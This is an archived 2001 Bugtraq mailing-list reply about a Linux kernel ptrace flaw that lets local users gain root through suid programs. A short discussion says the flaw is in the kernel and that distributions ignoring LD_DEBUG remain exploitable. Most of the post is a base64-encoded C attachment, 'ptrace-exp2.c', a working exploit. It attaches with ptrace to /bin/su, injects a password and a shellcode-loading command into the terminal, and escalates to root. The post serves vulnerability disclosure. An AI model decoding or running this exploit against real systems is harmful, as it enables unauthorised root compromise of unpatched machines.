[22912] in bugtraq
Re: Flaws in recent Linux kernels
daemon@ATHENA.MIT.EDU (Martin Kacer)
Fri Oct 19 13:22:16 2001
Date: Fri, 19 Oct 2001 16:47:13 +0200 (CEST)
From: Martin Kacer <m@kacer.net>
To: <bugtraq@securityfocus.com>
Cc: Rafal Wojtczuk <nergal@7bulls.com>
In-Reply-To: <20011018173540.A6671@emperor.7bulls.com>
Message-ID: <Pine.LNX.4.31.0110191625290.4215-200000@duck.sh.cvut.cz>
MIME-Version: 1.0
Content-Type: MULTIPART/Mixed; BOUNDARY=6TrnltStXW4iwmi0
Content-ID: <Pine.LNX.4.31.0110191625291.4215@duck.sh.cvut.cz>
Content-Disposition: INLINE
--6TrnltStXW4iwmi0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.31.0110191625292.4215@duck.sh.cvut.cz>
Content-Disposition: INLINE
On Thu, 18 Oct 2001, Rafal Wojtczuk wrote:
# In order for this flaw to be exploitable, /usr/bin/newgrp must be
# setuid root and world-executable. Additionally, newgrp, when run with no
# arguments, should not prompt for password. This
# conditions are satisfied in case of most popular Linux distributions (but
# not Openwall GNU/*/Linux).
Well, there is a little of inaccuracy in the first sentence. This is
a kernel flaw, NOT a bug in newgrp. Other suid programs can be used
instead...
Some distributions don't allow to export LD_* environment variables to
suid binaries (glibc issue, I think). Thus the trick with LD_DEBUG does
not work for them. Unfortunately, these distributions are still
exploitable.
Both of the preceeding paragraphs are demonstrated by the attached
exploit, which is a modification of nergal's code. The same
insert_hellcode program is needed.
The only difference is that /bin/su is used instead of newgrp, the
correct password is sent to su. Moreover, while su is waiting for the
password, ptraced process can easily run any suid binary, without the need
of fiddling with complex race conditions.
# 2.4.12 kernel fixes both presented problems. The attached patches,
# 2.2.19-deep-symlink.patch and 2.2.19-ptrace.patch, both blessed by Linus,
# can be used to close the vulnerability in 2.2.19. The (updated)
The patches can avoid my exploit too, of course.
# rely on race-conditions. And finally, notice that under Owl LD_DEBUG is
# ignored in case of suid binaries.
The main conclusion of my posting is: having other versions of newgrp
or ignoring LD_DEBUG is insufficient! Probably, ANY Linux distribution is
vulnerable without the kernel patches!
- M -
PS: What about executing suid binary while some other process has our
/proc/$$/mem opened for writing? Isn't there the same problem too?
Unfortunately, I do not have enough time to investigate that.
--6TrnltStXW4iwmi0
Content-Type: TEXT/x-csrc; name="ptrace-exp2.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.31.0110191647130.4215@duck.sh.cvut.cz>
Content-Description:
Content-Disposition: attachment; filename="ptrace-exp2.c"
LyogYnkgTmVyZ2FsLCBtb2RpZmllZCBieSBNYXJ3aW4gKi8NCiNpbmNsdWRl
IDxzdGRpby5oPg0KI2luY2x1ZGUgPHN5cy9wdHJhY2UuaD4NCiNpbmNsdWRl
IDxmY250bC5oPg0KI2luY2x1ZGUgPHN5cy9pb2N0bC5oPg0KI2luY2x1ZGUg
PHNpZ25hbC5oPg0KDQojZGVmaW5lIE1ZTE9HSU4gICAiam9obiINCiNkZWZp
bmUgTVlQQVNTV0QgICJoaXNwYXNzIg0KDQp2b2lkIGV4X3Bhc3N3ZChpbnQg
ZmQpDQp7DQoJc2xlZXAoMSk7DQoJZnByaW50ZihzdGRlcnIsImV4ZWN1dGlu
ZyBwYXNzd2RcbiIpOw0KCWV4ZWNsKCIvdXNyL2Jpbi9wYXNzd2QiLCAicGFz
c3dkIiwgMCk7DQoJcGVycm9yKCJleGVjbCIpOw0KCWV4aXQoMSk7DQp9DQp2
b2lkIHB1dDJ0dHkoY29uc3QgY2hhciogcHRyKQ0Kew0KCXdoaWxlICgqcHRy
ICYmICFpb2N0bCgwLCBUSU9DU1RJLCBwdHIrKykpOw0KfQ0Kdm9pZCBpbnNl
cnQoaW50IHBpZCkNCnsNCgljaGFyIGJ1ZlsxMDBdOw0KCWZwcmludGYoc3Rk
ZXJyLCJzZW5kaW5nIHBhc3N3b3JkXG4iKTsNCglzcHJpbnRmKGJ1ZiwgTVlQ
QVNTV0QgIlxuIik7DQoJcHV0MnR0eShidWYpOw0KCXNsZWVwKDEpOw0KCWZw
cmludGYoc3RkZXJyLCJzZW5kaW5nIG1hbGljaW91cyBjb21tYW5kXG4iKTsN
CglzcHJpbnRmKGJ1ZiwgImV4ZWMgLi9pbnNlcnRfc2hlbGxjb2RlICVpXG4i
LCBwaWQpOw0KCXB1dDJ0dHkoYnVmKTsNCn0NCg0KDQptYWluKGludCBhcmdj
LCBjaGFyICoqYXJndikNCnsNCglpbnQgcmVzLCBmaWZvOw0KCWludCBzdGF0
dXM7DQoJaW50IHBpZCwgbjsNCglpbnQgcGlwYVsyXTsNCgljaGFyIGJ1Zlsx
MDI0XTsNCglwaXBlKHBpcGEpOw0KCXN3aXRjaCAocGlkID0gZm9yaygpKSB7
DQoJY2FzZSAtMToNCgkJcGVycm9yKCJmb3JrIik7DQoJCWV4aXQoMSk7DQoJ
Y2FzZSAwOg0KCQljbG9zZShwaXBhWzFdKTsNCgkJZXhfcGFzc3dkKHBpcGFb
MF0pOw0KCWRlZmF1bHQ6Ow0KCX0NCg0KDQoJcmVzID0gcHRyYWNlKFBUUkFD
RV9BVFRBQ0gsIHBpZCwgMCwgMCk7DQoJaWYgKHJlcykgew0KCQlwZXJyb3Io
ImF0dGFjaCIpOw0KCQlleGl0KDEpOw0KCX0NCglyZXMgPSB3YWl0cGlkKC0x
LCAmc3RhdHVzLCAwKTsNCglpZiAocmVzID09IC0xKSB7DQoJCXBlcnJvcigi
d2FpdHBpZCIpOw0KCQlleGl0KDEpOw0KCX0NCglyZXMgPSBwdHJhY2UoUFRS
QUNFX0NPTlQsIHBpZCwgMCwgMCk7DQoJaWYgKHJlcykgew0KCQlwZXJyb3Io
ImNvbnQiKTsNCgkJZXhpdCgxKTsNCgl9DQoJZnByaW50ZihzdGRlcnIsICJh
dHRhY2hlZFxuIik7DQoJc3dpdGNoIChmb3JrKCkpIHsNCgljYXNlIC0xOg0K
CQlwZXJyb3IoImZvcmsiKTsNCgkJZXhpdCgxKTsNCgljYXNlIDA6DQoJCWNs
b3NlKHBpcGFbMV0pOw0KCQlzbGVlcCgzKTsNCgkJaW5zZXJ0KHBpZCk7DQoJ
CWRvIHsNCgkJCW4gPSByZWFkKHBpcGFbMF0sIGJ1Ziwgc2l6ZW9mKGJ1Zikp
Ow0KCQl9IHdoaWxlIChuID4gMCk7DQoJCWlmIChuIDwgMCkNCgkJCXBlcnJv
cigicmVhZCIpOw0KCQlleGl0KDApOw0KCWRlZmF1bHQ6Ow0KCX0NCgljbG9z
ZShwaXBhWzBdKTsNCg0KCWNsb3NlKDIpOw0KCWR1cDIocGlwYVsxXSwgMik7
DQoJY2xvc2UocGlwYVsxXSk7DQoJLyogRGVjcnlzdGFsbGl6aW5nIHJlYXNv
biAqLw0KCXNldGVudigiTERfREVCVUciLCAibGlicyIsIDEpOw0KCS8qIFdp
dGggc3RyZW5ndGggSSBidXJuICovIA0KCWV4ZWNsKCIvYmluL3N1IiwgInN1
IiwgTVlMT0dJTiwgMCk7DQp9DQo=
--6TrnltStXW4iwmi0--
